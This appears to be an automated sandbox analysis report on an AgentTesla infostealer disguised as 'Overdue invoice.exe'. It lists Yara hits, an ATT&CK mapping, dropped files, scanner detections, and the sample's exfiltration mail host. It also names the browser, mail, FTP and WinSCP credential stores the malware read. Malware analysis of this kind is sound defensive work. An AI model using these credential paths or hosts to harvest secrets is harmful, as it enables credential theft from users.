                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		1
                    Input Capture                    		114
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Obfuscated Files or Information                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object Model1
                    Input Capture                    		Scheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 635084 Sample: Overdue invoice.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 12 other signatures 2->55 7 Overdue invoice.exe 6 2->7         started        11 yqWDN.exe 5 2->11         started        14 yqWDN.exe 2 2->14         started        process3 dnsIp4 39 C:\Users\user\AppData\...\dYXeRswtYBrq.exe, PE32 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmpA306.tmp, XML 7->41 dropped 43 C:\Users\user\...\Overdue invoice.exe.log, ASCII 7->43 dropped 69 Injects a PE file into a foreign processes 7->69 16 Overdue invoice.exe 2 5 7->16         started        21 schtasks.exe 1 7->21         started        23 Overdue invoice.exe 7->23         started        47 192.168.2.1 unknown unknown 11->47 71 Multi AV Scanner detection for dropped file 11->71 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->73 75 Machine Learning detection for dropped file 11->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 11->77 25 yqWDN.exe 2 11->25         started        27 schtasks.exe 1 11->27         started        file5 signatures6 process7 dnsIp8 45 mail.jkudyog.com 206.183.111.188, 49715, 49745, 587 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN United States 16->45 33 C:\Users\user\AppData\Roaming\...\yqWDN.exe, PE32 16->33 dropped 35 C:\Windows\System32\drivers\etc\hosts, ASCII 16->35 dropped 37 C:\Users\user\...\yqWDN.exe:Zone.Identifier, ASCII 16->37 dropped 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->57 59 Tries to steal Mail credentials (via file / registry access) 16->59 61 Modifies the hosts file 16->61 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->63 29 conhost.exe 21->29         started        65 Tries to harvest and steal ftp login credentials 25->65 67 Tries to harvest and steal browser information (history, passwords, etc) 25->67 31 conhost.exe 27->31         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Overdue invoice.exe61%VirustotalBrowse
                    Overdue invoice.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    Overdue invoice.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    19.0.yqWDN.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    19.2.yqWDN.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.2.Overdue invoice.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.jkudyog.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn//:0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comepko0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://mail.jkudyog.com0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnoO0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-212556320%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.fonts.comn0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.urwpp.depA0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/l0%Avira URL Cloudsafe
                    http://www.fontbureau.comttoF0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.de0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.com=0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr=0%Avira URL Cloudsafe
                    http://www.fontbureau.comlicF0%URL Reputationsafe
                    https://I323GyXsTwT8KsWsK7L.net80%Avira URL Cloudsafe
                    http://www.agfamonotype.0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.founder.com.cn/cnt-ia0%Avira URL Cloudsafe
                    http://www.fontbureau.comoGC0%Avira URL Cloudsafe
                    http://www.fontbureau.comdc0%Avira URL Cloudsafe
                    http://dWZLeu.com0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr$A0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnz0%URL Reputationsafe
                    http://www.fontbureau.comd0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.sandoll.co.krF10%Avira URL Cloudsafe
                    http://www.fontbureau.comB.TTFlC0%Avira URL Cloudsafe
                    https://I323GyXsTwT8KsWsK7L.net0%Avira URL Cloudsafe
                    http://www.fontbureau.comm0%URL Reputationsafe
                    http://www.founder.com.cn/cne-d0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.fontbureau.como0%URL Reputationsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.tiro.comh0%URL Reputationsafe
                    http://www.tiro.comc0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.jkudyog.com
                    		206.183.111.188
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.fontbureau.com/designersGOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/3COverdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn//:Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comepkoOverdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comessedOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.goodfont.co.krOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://mail.jkudyog.comOverdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnoOOverdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comOverdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comnOverdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.depAOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/lOverdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comttoFOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fonts.comOverdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOverdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sakkal.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com=Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.sandoll.co.kr=Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comlicFOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://I323GyXsTwT8KsWsK7L.net8Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.agfamonotype.Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwOverdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnt-iaOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.comoGCOverdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.comdcOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
